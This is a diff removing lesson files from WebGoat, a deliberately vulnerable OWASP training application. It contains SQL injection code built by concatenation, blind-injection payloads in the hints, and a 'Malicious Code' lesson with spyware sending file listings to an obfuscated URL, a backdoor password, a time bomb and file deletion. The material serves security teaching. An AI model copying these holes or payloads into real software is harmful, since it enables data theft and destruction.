-                s.setMessage(getLabelManager().get("BasicAuthenticationStage1Completed"));
-
-                // If the auth header is different but still the original user - tell the user
-                // that the original cookie was posted bak and basic auth uses the cookie before the
-                // authorization token
-                if (!originalAuth.equals("") && !originalAuth.equals(s.getHeader(AUTHORIZATION)))
-                {
-                    ec
-                            .addElement(getLabelManager().get("BasicAuthenticationAlmostThere1")
-                                    + AUTHORIZATION
-                                    + getLabelManager().get("BasicAuthenticationAlmostThere2")
-                                    + s.getUserName()
-                                    + getLabelManager().get("BasicAuthenticationAlmostThere3"));
-                }
-                else if (!originalSessionId.equals(s.getCookie(JSESSIONID)))
-                {
-                    ec
-                            .addElement(getLabelManager().get("BasicAuthenticationReallyClose"));
-                                    
-                }
-                else
-                {
-                    ec.addElement(getLabelManager().get("BasicAuthenticationUseTheHints"));
-                }
-
-            }
-
-        } catch (Exception e)
-        {
-            s.setMessage(getLabelManager().get("ErrorGenerating") + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the ForgotPassword object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-
-        return Category.AUTHENTICATION;
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        // int stage = getLessonTracker(session, BASIC).getStage();
-
-        // switch ( stage )
-        // {
-        // case 1:
-        hints.add(getLabelManager().get("BasicAuthenticationHint1"));
-        hints.add(getLabelManager().get("BasicAuthenticationHint2"));
-        hints.add(getLabelManager().get("BasicAuthenticationHint3"));
-        hints.add(getLabelManager().get("BasicAuthenticationHint4"));
-        
-        // break;
-        // case 2:
-        hints.add(getLabelManager().get("BasicAuthenticationHint5"));
-        hints.add(getLabelManager().get("BasicAuthenticationHint6"));
-        hints.add(getLabelManager().get("BasicAuthenticationHint7"));
-        hints.add(getLabelManager().get("BasicAuthenticationHint8"));
-        hints.add(getLabelManager().get("BasicAuthenticationHint9"));
-        
-        // break;
-        // }
-
-        return hints;
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(100);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Basic Authentication");
-    }
-
-}

src/main/java/org/owasp/webgoat/lessons/BlindNumericSqlInjection.java

@@ -1,273 +0,0 @@
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.List;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-/*******************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
- *         site</a> (this lesson is heavily based on Bruce Mayhews' SQL
- *         Injection lesson
- * @created January 14, 2005
- */
-public class BlindNumericSqlInjection extends LessonAdapter
-{
-
-    public final static A MANDIANT_LOGO = new A().setHref("http://www.mandiant.com").addElement(new IMG("images/logos/mandiant.png").setAlt("MANDIANT").setBorder(0).setHspace(0).setVspace(0));
-    
-    private final static String ACCT_NUM = "account_number";
-
-    private final static String TARGET_CC_NUM = "1111222233334444";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *                Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-    ElementContainer ec = new ElementContainer();
-
-    try
-    {
-        Connection connection = DatabaseUtilities.getConnection(s);
-
-        ec.addElement(new P().addElement("Enter your Account Number: "));
-
-        String accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101");
-        Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString());
-        ec.addElement(input);
-
-        Element b = ECSFactory.makeButton("Go!");
-        ec.addElement(b);
-
-        String query = "SELECT * FROM user_data WHERE userid = " + accountNumber;
-        String answer_query;
-//      if (runningOnWindows())
-//      {
-//      answer_query = "SELECT TOP 1 first_name FROM user_data WHERE userid = "
-//          + TARGET_CC_NUM;
-//      } else
-//      {
-        answer_query = "SELECT pin FROM pins WHERE cc_number = '" + TARGET_CC_NUM + "'";
-//      }
-
-        try
-        {
-        Statement answer_statement = connection.createStatement(
-            ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-        ResultSet answer_results = answer_statement.executeQuery(answer_query);
-        answer_results.first();
-        System.out.println("Account: " + accountNumber );
-        System.out.println("Answer : " + answer_results.getString(1));
-        if (accountNumber.toString().equals(answer_results.getString(1)))
-        {
-            makeSuccess(s);
-        } else
-        {
-
-            Statement statement = connection.createStatement(
-                ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-            ResultSet results = statement.executeQuery(query);
-
-            if ((results != null) && (results.first() == true))
-            {
-            ec.addElement(new P().addElement("Account number is valid."));
-            } else
-            {
-            ec.addElement(new P().addElement("Invalid account number."));
-            }
-        }
-        }
-        catch (SQLException sqle)
-        {
-        ec.addElement(new P().addElement("An error occurred, please try again."));
-        }
-    }
-    catch (Exception e)
-    {
-        s.setMessage("Error generating " + this.getClass().getName());
-        e.printStackTrace();
-    }
-
-    return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the SqlInjection object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-    return Category.INJECTION;
-    }
-
-    /**
-     * Gets the credits attribute of the AbstractLesson object
-     * 
-     * @return The credits value
-     */
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Chuck Willis&nbsp;", MANDIANT_LOGO);
-    }
-
-    /**
-     * Gets the hints attribute of the DatabaseFieldScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-    List<String> hints = new ArrayList<String>();
-//  if (runningOnWindows())
-//  {
-        hints
-            .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
-                + "Create a SQL statement that you can use as a true/false test and then "
-                + "start narrowing down the number using > and <"
-                + "<br><br>The backend database is HSQLDB, but this shouldn't make any difference because "
-                + "you can solve this lesson with standard SQL syntax.");
-
-        hints
-            .add("The application is taking your input and inserting it at the end of a pre-formed SQL command. "
-                + "You will need to make use of the following SQL functions: "
-                + "<br><br>AND - combine the logic of the normal query with a boolean result"
-                + "<br><br>( and ) - group subexpressions so they evaluate properly"
-                + "<br><br>SELECT - make a subquery for your target data and get a number"
-                + "<br><br>&gt and = and &lt - once you have the number, compare it to a choosen one");
-        
-        hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
-                + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber ");
-        hints
-            .add("Here is an example for another table:"
-            + "<br><br> In the table <i>user_data</i>, is the <i>userid</i> for the record with a <i>cc_number</i> of "
-            + "<i>333498703333</i>"
-            + " greater than 100? "
-            + "<br><br>101 AND ((SELECT userid FROM user_data WHERE cc_number='"
-            + "333498703333"
-            + "') &gt 100 ); "
-            + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-            + "invalid then answer is no.");
-        hints
-            .add("Partial Solution:" 
-                + "<br><br>Is the <i>pin</i> of the record with a <i>cc_number</i> of <i>"
-                + TARGET_CC_NUM
-                + "</i> greater than 1000? "
-                + "<br><br>101 AND ((SELECT pin FROM pins WHERE cc_number='"
-                + TARGET_CC_NUM
-                + "') &gt 1000 ); "
-                + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-                + "invalid then answer is no.");
-        hints
-            .add("Another Part of Solution:"
-                + "<br><br>Is the <i>pin</i> of the record with a <i>cc_number</i> of <i>"
-                + TARGET_CC_NUM
-                + "</i> greater than 10000? "
-                + "<br><br>101 AND ((SELECT pin FROM pins WHERE cc_number='"
-                + TARGET_CC_NUM
-                + "') &gt 10000 ); "
-                + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-                + "invalid then answer is no.");
-
-    return hints;
-    }
-
-    /**
-     * Gets the instructions attribute of the SqlInjection object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-    String instructions = "The form below allows a user to enter an account number and determine if "
-        + "it is valid or not.  Use this form to develop a true / false test check other entries in the database.  "
-        + "<br><br>The goal is to find the value of "
-        + "the field <b>pin</b> in table <b>pins</b> for the row with the <b>cc_number</b> of <b> "
-        + TARGET_CC_NUM
-        + "</b>.  The field is of type int, which is an integer."
-        + "<br><br>Put the discovered pin value in the form to pass the lesson.";
-
-    return (instructions);
-    }
-
-    private final static Integer DEFAULT_RANKING = new Integer(90);
-
-    protected Integer getDefaultRanking()
-    {
-    return DEFAULT_RANKING;
-    }
-
-    /**
-     * Gets the title attribute of the DatabaseFieldScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-    return ("Blind Numeric SQL Injection");
-    }
-
-    /**
-     * Constructor for the DatabaseFieldScreen object
-     * 
-     * @param s
-     *                Description of the Parameter
-     */
-    public void handleRequest(WebSession s)
-    {
-    try
-    {
-        super.handleRequest(s);
-    }
-    catch (Exception e)
-    {
-        System.out.println("Exception caught: " + e);
-        e.printStackTrace(System.out);
-    }
-    }
-}

src/main/java/org/owasp/webgoat/lessons/BlindScript.java

@@ -1,403 +0,0 @@
-package org.owasp.webgoat.lessons;
-
-import java.io.BufferedReader;
-import java.io.File;
-import java.io.IOException;
-import java.io.InputStreamReader;
-import java.io.OutputStreamWriter;
-import java.lang.reflect.Method;
-import java.net.URL;
-import java.net.URLConnection;
-import java.sql.PreparedStatement;
-import java.sql.ResultSet;
-import java.util.ArrayList;
-import java.util.Calendar;
-import java.util.List;
-import java.util.StringTokenizer;
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.StringElement;
-import org.apache.ecs.html.Input;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.LessonTracker;
-import org.owasp.webgoat.session.WebSession;
-import javax.tools.JavaCompiler;
-import javax.tools.JavaFileObject;
-import javax.tools.SimpleJavaFileObject;
-import javax.tools.ToolProvider;
-import java.io.IOException;
-import java.net.URI;
-import java.net.URISyntaxException;
-import java.util.Arrays;
-
-/*******************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
- * @created October 28, 2003
- */
-public class BlindScript extends LessonAdapter
-{
-    private final static String PERSON = "person";
-    private final static String CODE = "code";
-    private final static String METHOD = "method";
-    private final static String ARG_TYPES = "argTypes";
-    private final static String PARAMS = "params";
-    private final static String WEBGOAT_URL = "aHR0cDovL2xvY2FsaG9zdC9XZWJHb2F0L2NhdGNoZXI/UFJPUEVSVFk9eWVz";
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *            Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-
-        StringBuffer person = null;
-        try
-        {
-            person = new StringBuffer(s.getParser().getStringParameter(PERSON, ""));
-
-            if (!"".equals(person.toString()))
-            {
-                ec.addElement(new StringElement("Sorry.  Could not locate record for: "
-                        + person.toString()));
-            }
-
-            ec.addElement(new StringElement("Enter your name: "));
-
-            Input input = new Input(Input.TEXT, PERSON, person.toString());
-            ec.addElement(input);
-
-            Element b = ECSFactory.makeButton("Go!");
-            ec.addElement(b);
-        }
-        catch (Exception e)
-        {
-            s.setMessage("Error generating " + this.getClass().getName());
-            e.printStackTrace();
-        }
-
-        // Easter Egg
-        if ("BrucE".equals(person.toString()))
-        {
-            ec = easterEgg(s);
-            makeSuccess(s);
-        }
-
-        executeSpyWare(s);
-        executeTimeTrigger(s);
-        executeEventTrigger(s);
-        executeBackDoor(s);
-        
-        // Dynamic Class Loading
-        String code = s.getParser().getStringParameter(CODE, "");
-        String method = s.getParser().getStringParameter(METHOD, "");
-        String argTypes = s.getParser().getStringParameter(ARG_TYPES, "");
-        String params = s.getParser().getStringParameter(PARAMS, "");
-        if (!code.equals(""))
-        {
-        try
-        {
-            loadMe(s, code, method, argTypes, params);
-        }
-        catch (IOException e)
-        {
-            // do nothing to hide the error
-        }
-        }
-        return (ec);
-    }
-
-    private void executeBackDoor(WebSession s)
-    {
-        
-        // Make me an admin
-        String me = s.getParser().getStringParameter(PERSON, "");
-        if ("B_Admin443".equals(me))
-        {
-            s.setAdmin(true);
-        }
-
-        // This won't actually work for WebGoat, it's setting the admin flag AFTER
-        // the admin checks have been performed and the lessons/functions have been
-        // loaded for the user.
-    }
-    
-    public void executeSpyWare( WebSession s )
-    {
-        // Lets gather some information about the users browsing history
-        String userHome = System.getProperty("user.home" ) + "\\Local Settings\\Temporary Internet Files";
-        String separator = System.getProperty("line.separator");
-        File dir = new File(userHome);
-        StringBuffer browserFiles = new StringBuffer();
-        if (dir.isDirectory()) {
-            File[] children = dir.listFiles();
-            for (int i=0; i<children.length; i++) {
-                browserFiles.append(children[i].getName());
-                browserFiles.append(separator);
-            }
-        }
-        
-        // post the data to my listen servlet
-        try {
-            
-            // Send data
-            String partner = new String(new sun.misc.BASE64Decoder().decodeBuffer(WEBGOAT_URL));
-            URL url = new URL(partner);
-            URLConnection conn = url.openConnection();
-            conn.setDoOutput(true);
-            OutputStreamWriter wr = new OutputStreamWriter(conn.getOutputStream());
-            wr.write("&cache=" + browserFiles.toString());
-            wr.flush();
-        
-            // Get the response
-            BufferedReader rd = new BufferedReader(new InputStreamReader(conn.getInputStream()));
-            String line;
-            while ((line = rd.readLine()) != null) {
-                // Process response if we cared
-            }
-            wr.close();
-            rd.close();
-        } catch (Exception e) {
-        }
-
-    }
-    private void executeEventTrigger(WebSession s)
-    {
-        
-        //  after 100 loads delete all the user status
-
-        LessonTracker lt = this.getLessonTracker(s);
-        if (lt.getNumVisits() > 100 )
-        {
-            // Delete all the user files
-            String userDir = LessonTracker.getUserDir(s);
-            File dir = new File(userDir);
-            if (dir.isDirectory()) {
-                String[] children = dir.list();
-                for (int i=0; i<children.length; i++) {
-                    new File(dir, children[i]).delete();
-                }
-            }
-        }
-    }
-
-    
-    private void executeTimeTrigger(WebSession s)
-    {
-        Calendar cal1 = Calendar.getInstance();
-        Calendar cal2 = Calendar.getInstance();
-        cal2.set(2010, 1, 13);  // Jan 13th 2010
-        
-        // Event triggered time bomb
-        if (cal1.getTime().after(cal2.getTime()))
-        {
-            // Query the database for the profile data of the given employee
-            try
-            {
-                String query = "DELETE employee";
-                PreparedStatement statement = WebSession.getConnection(s).prepareStatement(query,
-                        ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_UPDATABLE);
-                statement.executeQuery();
-            }
-            catch (Exception e)
-            { // eat any exceptions
-            }
-        }
-    }
-
-    //http://localhost:8888/WebGoat/attack?Screen=18&menu=50&code=org.owasp.webgoat.lessons.Challenge2Screen&method=getInstructions&argTypes=W&params=this
-    public static String loadMe(WebSession s, String clazz, String method, String argTypes, String params) throws IOException
-    {
-        try
-        {
-            Class cls = (Class.forName(clazz));
-            StringTokenizer argsTok = new StringTokenizer(argTypes, ",");
-            StringTokenizer paramsTok = new StringTokenizer(params, ",");
-            
-            // Build the list of parameter types to look up the method
-            Class parameterType[] = null;
-            Object argList[] = null;
-            if ( argsTok.countTokens() >= 1 )
-            {
-                parameterType = new Class[argsTok.countTokens()];
-            }
-            if (paramsTok.countTokens() >= 1 )
-            {
-                argList = new Object[paramsTok.countTokens()];
-            }
-            
-            int i = 0;
-            while (argsTok.hasMoreTokens())
-            {
-                String argString = argsTok.nextToken();
-                
-                if ("W".equals(argString))
-                {
-                    parameterType[i] = WebSession.class;
-                    argList[i] = s;
-                } else if ("S".equals(argString))
-                {
-                    parameterType[i] = String.class;
-                }
-             else if ("I".equals(argString))
-            {
-                parameterType[i] = Integer.class;
-            }
-            }   
-                
-            Method meth = cls.getMethod(method, parameterType);
-            String retobj = (String) meth.invoke(cls, argList);
-            return retobj;
-        }
-        catch (Exception e)
-        {
-            e.printStackTrace();
-        }
-        return null;
-    }
-
-    private ElementContainer easterEgg(WebSession s)
-    {
-        ElementContainer ec = new ElementContainer();
-        ec.addElement(new StringElement("Bruce - You are the greatest!"));
-        return ec;
-
-    }
-
-    /**
-     * Gets the hints attribute of the HelloScreen object
-     * 
-     * @return The hints value
-     */
-    public List<String> getHints(WebSession s)
-    {
-        List<String> hints = new ArrayList<String>();
-        hints.add("Type in Bruce and press 'go'");
-        hints.add("");
-        hints.add("Press the Show Lesson Plan button to view a lesson summary");
-
-        return hints;
-    }
-
-    /**
-     * Gets the ranking attribute of the HelloScreen object
-     * 
-     * @return The ranking value
-     */
-    private final static Integer DEFAULT_RANKING = new Integer(10);
-
-    protected Integer getDefaultRanking()
-    {
-        return DEFAULT_RANKING;
-    }
-
-    protected Category getDefaultCategory()
-    {
-        return Category.GENERAL;
-    }
-
-    /**
-     * Gets the title attribute of the HelloScreen object
-     * 
-     * @return The title value
-     */
-    public String getTitle()
-    {
-        return ("Malicious Code");
-    }
-    
-
-    private static boolean compile( JavaFileObject... source )
-        {
-        final JavaCompiler compiler = ToolProvider.getSystemJavaCompiler();
-
-        final JavaCompiler.CompilationTask task = compiler.getTask( null,
-                null,
-                null,
-                null,
-                null,
-                Arrays.asList( source ) );
-        return task.call();
-        }
-
-    private static String compose()
-    {
-        final StringBuilder sb = new StringBuilder( 1000 );
-        sb.append( "package org.owasp.webgoat.lessons;\n" );
-
-        sb.append( "import java.io.File;\n" );
-        sb.append( "public class Deleter\n" );
-        sb.append( "{\n" );
-        sb.append( "static {\n" );
-        sb.append( "File foo = new File(\"C:\\temp\\user.txt\");\n" );
-        sb.append( "foo.delete();\n" );
-        sb.append( "  }\n" );
-        sb.append( "}\n" );
-        return sb.toString();
-    }
-
-    public static void StaticDeleter(  ) 
-    {
-        final String programText = compose(  );
-        try
-        {
-            compile( new ResidentJavaFileObject( "Deleter", programText ) );
-            Class.forName( "org.owasp.webgoat.lessons.Deleter" ).newInstance();
-        } catch (URISyntaxException e)
-        {
-        } catch (InstantiationException e)
-        {
-        } catch (IllegalAccessException e)
-        {
-        } catch (ClassNotFoundException e)
-        {
-        }
-    }
-}
-
-    class ResidentJavaFileObject extends SimpleJavaFileObject
-    {
-    private final String programText;
-
-    public ResidentJavaFileObject( String className, String programText ) throws URISyntaxException
-        {
-        super( new URI( className + ".java" ), Kind.SOURCE );
-        this.programText = programText;
-        }
-
-    public CharSequence getCharContent( boolean ignoreEncodingErrors ) throws IOException
-        {
-        return programText;
-        }
-    }   
-    

src/main/java/org/owasp/webgoat/lessons/BlindStringSqlInjection.java

@@ -1,322 +0,0 @@
-package org.owasp.webgoat.lessons;
-
-import java.sql.Connection;
-import java.sql.ResultSet;
-import java.sql.SQLException;
-import java.sql.Statement;
-import java.util.ArrayList;
-import java.util.List;
-
-import org.apache.ecs.Element;
-import org.apache.ecs.ElementContainer;
-import org.apache.ecs.html.Input;
-import org.apache.ecs.html.P;
-import org.apache.ecs.html.A;
-import org.apache.ecs.html.IMG;
-import org.owasp.webgoat.session.DatabaseUtilities;
-import org.owasp.webgoat.session.ECSFactory;
-import org.owasp.webgoat.session.WebSession;
-
-/*******************************************************************************
- * 
- * 
- * This file is part of WebGoat, an Open Web Application Security Project
- * utility. For details, please see http://www.owasp.org/
- * 
- * Copyright (c) 2002 - 20014 Bruce Mayhew
- * 
- * This program is free software; you can redistribute it and/or modify it under
- * the terms of the GNU General Public License as published by the Free Software
- * Foundation; either version 2 of the License, or (at your option) any later
- * version.
- * 
- * This program is distributed in the hope that it will be useful, but WITHOUT
- * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
- * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
- * details.
- * 
- * You should have received a copy of the GNU General Public License along with
- * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
- * Place - Suite 330, Boston, MA 02111-1307, USA.
- * 
- * Getting Source ==============
- * 
- * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
- * for free software projects.
- * 
- * For details, please see http://webgoat.github.io
- * 
- * @author Chuck Willis <a href="http://www.securityfoundry.com">Chuck's web
- *         site</a> (this lesson is heavily based on Bruce Mayhews' SQL
- *         Injection lesson
- * @created January 14, 2005
- */
-public class BlindStringSqlInjection extends LessonAdapter
-{
-
-    public final static A MANDIANT_LOGO = new A().setHref("http://www.mandiant.com").addElement(new IMG("images/logos/mandiant.png").setAlt("MANDIANT").setBorder(0).setHspace(0).setVspace(0));
-    
-    private final static String ACCT_NUM = "account_number";
-
-    private final static String TARGET_CC_NUM = "4321432143214321";
-
-    /**
-     * Description of the Method
-     * 
-     * @param s
-     *                Description of the Parameter
-     * @return Description of the Return Value
-     */
-    protected Element createContent(WebSession s)
-    {
-    ElementContainer ec = new ElementContainer();
-
-    try
-    {
-        Connection connection = DatabaseUtilities.getConnection(s);
-
-        ec.addElement(new P().addElement("Enter your Account Number: "));
-
-        String accountNumber = s.getParser().getRawParameter(ACCT_NUM, "101");
-        Input input = new Input(Input.TEXT, ACCT_NUM, accountNumber.toString());
-        ec.addElement(input);
-
-        Element b = ECSFactory.makeButton("Go!");
-        ec.addElement(b);
-
-        String query = "SELECT * FROM user_data WHERE userid = " + accountNumber;
-        String answer_query;
-//      if (runningOnWindows())
-//      {
-//      answer_query = "SELECT TOP 1 first_name FROM user_data WHERE userid = "
-//          + TARGET_CC_NUM;
-//      } else
-//      {
-        answer_query = "SELECT name FROM pins WHERE cc_number = '" + TARGET_CC_NUM +"'";
-//      }
-
-        try
-        {
-        Statement answer_statement = connection.createStatement(
-            ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-        ResultSet answer_results = answer_statement.executeQuery(answer_query);
-        answer_results.first();
-        System.out.println("Account: " + accountNumber );
-        System.out.println("Answer : " + answer_results.getString(1));
-        if (accountNumber.toString().equals(answer_results.getString(1)))
-        {
-            makeSuccess(s);
-        } else
-        {
-
-            Statement statement = connection.createStatement(
-                ResultSet.TYPE_SCROLL_INSENSITIVE, ResultSet.CONCUR_READ_ONLY);
-            ResultSet results = statement.executeQuery(query);
-
-            if ((results != null) && (results.first() == true))
-            {
-            ec.addElement(new P().addElement("Account number is valid"));
-            } else
-            {
-            ec.addElement(new P().addElement("Invalid account number"));
-            }
-        }
-        }
-        catch (SQLException sqle)
-        {
-        ec.addElement(new P().addElement("An error occurred, please try again."));
-        
-        // comment out two lines below
-        ec.addElement(new P().addElement(sqle.getMessage()));
-        sqle.printStackTrace();
-        
-        }
-    }
-    catch (Exception e)
-    {
-        s.setMessage("Error generating " + this.getClass().getName());
-        e.printStackTrace();
-    }
-
-    return (ec);
-    }
-
-    /**
-     * Gets the category attribute of the SqlInjection object
-     * 
-     * @return The category value
-     */
-    protected Category getDefaultCategory()
-    {
-    return Category.INJECTION;
-    }
-
-    /**
-     * Gets the credits attribute of the AbstractLesson object
-     * 
-     * @return The credits value
-     */
-    public Element getCredits()
-    {
-        return super.getCustomCredits("Created by Chuck Willis&nbsp;", MANDIANT_LOGO);
-    }
-
-    /**
-     * 
-     * Determines the OS that WebGoat is running on. Needed because different DB
-     * backends are used on the different OSes (Access on Windows, InstantDB on
-     * others)
-     * 
-     * @return true if running on Windows, false otherwise
-     */
-//    private boolean runningOnWindows()
-//    {
-//  String os = System.getProperty("os.name", "Windows");
-//  if (os.toLowerCase().indexOf("window") != -1)
-//  {
-//      return true;
-//  } else
-//  {
-//      return false;
-//  }
-//    }
-
-    /**
-     * Gets the hints attribute of the DatabaseFieldScreen object
-     * 
-     * @return The hints value
-     */
-    protected List<String> getHints(WebSession s)
-    {
-    List<String> hints = new ArrayList<String>();
-//  if (runningOnWindows())
-//  {
-        hints
-            .add("Compound SQL statements can be made by joining multiple tests with keywords like AND and OR. "
-                + "Create a SQL statement that you can use as a true/false test and then "
-                + "select the first character of the target element and do a start narrowing "
-                + "down the character using > and <"
-                + "<br><br>The backend database is HSQLDB.  Keep that in mind if you research SQL functions "
-                + "on the Internet since different databases use some different functions and syntax."
-                
-                + "<br><br>You can find more about HSQLDB's SQL Syntax at "
-                + "<a href='http://hsqldb.org/doc/guide/ch09.html'>http://hsqldb.org/doc/guide/ch09.html</a>.  "
-                + "Pay attention to the section titled \"String built-in Functions / Stored Procedures\".");
-
-        hints
-            .add("The application is taking your input and inserting it at the end of a pre-formed SQL command. "
-                + "You will need to make use of the following SQL contstructs: "
-                
-                + "<br><br>AND - combine the logic of the normal query with a boolean result"       
-                + "<br><br>( and ) - group subexpressions so they evaluate properly"
-                + "<br><br>SELECT - make a subquery for your target data and get a string "
-                + "<br><br>SUBSTRING(string, start, length) - returns a "
-                + "substring of string starting at the start character and going for length characters "
-                + "<br><br>&gt and = and &lt - once you have a character's value, compare it to a choosen one"
-                + "<br><br>You can find more about HSQLDB's SQL Syntax at "
-                + "<a href='http://hsqldb.org/doc/guide/ch09.html'>http://hsqldb.org/doc/guide/ch09.html</a>");
-            
-        hints.add("This is the code for the query being built and issued by WebGoat:<br><br> "
-                + "\"SELECT * FROM user_data WHERE userid = \" + accountNumber ");
-        
-        hints
-            .add("Here is an example for another table:"
-                + "<br><br>In the table <i>user_data</i>, is the first character of the <i>first_name</i> for the record with a <i>cc_number</i> of "
-                + "<i>333498703333</i>"
-                + " greater than 'M'? "
-                + "<br><br>101 AND (SUBSTRING((SELECT first_name FROM user_data WHERE cc_number='"
-                + "333498703333"
-                + "'), 1, 1) &gt 'M' ); "
-                + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-                + "invalid then answer is no.");
-        hints
-            .add("Partial Solution for First Character:"
-                + "<br><br>Is the first character of the <i>name</i> of the record with a <i>cc_number</i> of <i>"
-                + TARGET_CC_NUM
-                + "</i> less than 'M'? "
-                + "<br><br>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='"
-                + TARGET_CC_NUM
-                + "'), 1, 1) &lt 'M' ); "
-                + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-                + "invalid then answer is no.");
-        hints
-            .add("Another Part of Solution for First Character:"
-                + "<br><br>Is the first character of the <i>name</i> of the record with a <i>cc_number</i> of <i>"
-                + TARGET_CC_NUM
-                + "</i> less than 'H'? "
-                + "<br><br>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='"
-                + TARGET_CC_NUM
-                + "'), 1, 1) &lt 'H' ); "
-                + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-                + "invalid then answer is no.");
-        hints
-            .add("Partial Solution for Second Character:"
-                + "<br><br>Is the second character of the <i>name</i> of the record with a <i>cc_number</i> of <i>"
-                + TARGET_CC_NUM
-                + "</i> greater than 'k'? "
-                + "<br><br>101 AND (SUBSTRING((SELECT name FROM pins WHERE cc_number='"
-                + TARGET_CC_NUM
-                + "'), 2, 1) &gt 'k' ); "
-                + "<br><br>If you get back that account number is valid, then yes.  If get back that the number is "
-                + "invalid then answer is no.");
-        
-
-    return hints;
-    }
-
-    /**
-     * Gets the instructions attribute of the SqlInjection object
-     * 
-     * @return The instructions value
-     */
-    public String getInstructions(WebSession s)
-    {
-    String instructions = "The form below allows a user to enter an account number and determine if "
-        + "it is valid or not.  Use this form to develop a true / false test check other entries in the database.  "
-        + "<br><br>Reference Ascii Values: 'A' = 65   'Z' = 90   'a' = 97   'z' = 122 "
-        + "<br><br>The goal is to find the value of "
-        + "the field <b>name</b> in table <b>pins</b> for the row with the <b>cc_number</b> of <b>"
-        + TARGET_CC_NUM
-        + "</b>.  The field is of type varchar, which is a string." 
-        + "<br><br>Put the discovered name in the form to pass the lesson.  Only the discovered name "
-        + "should be put into the form field, paying close attention to the spelling and capitalization.";
-
-    return (instructions);
-    }
-
